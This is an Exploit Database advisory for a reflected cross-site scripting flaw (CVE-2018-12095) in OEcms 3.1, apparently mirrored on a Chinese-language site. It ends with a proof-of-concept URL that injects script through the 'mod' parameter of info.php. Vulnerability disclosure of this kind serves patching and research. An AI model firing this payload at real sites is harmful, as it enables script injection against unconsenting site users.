OEcms 3.1 – Cross-Site Scripting

• Exploit Database
• 38 阅读

• 作者： Renzi
  日期： 2018-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44895/

• # Title: OEcms 3.1 - Cross-Site Scripting 
  # Author: Felipe "Renzi" Gabriel
  # Date: 2018-06-15
  # Software: OEcms v3.1
  # CVE: CVE-2018-12095
   
  # Technical Details & Description:
  # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
  # The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request.
   
  # PoC
   
  http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>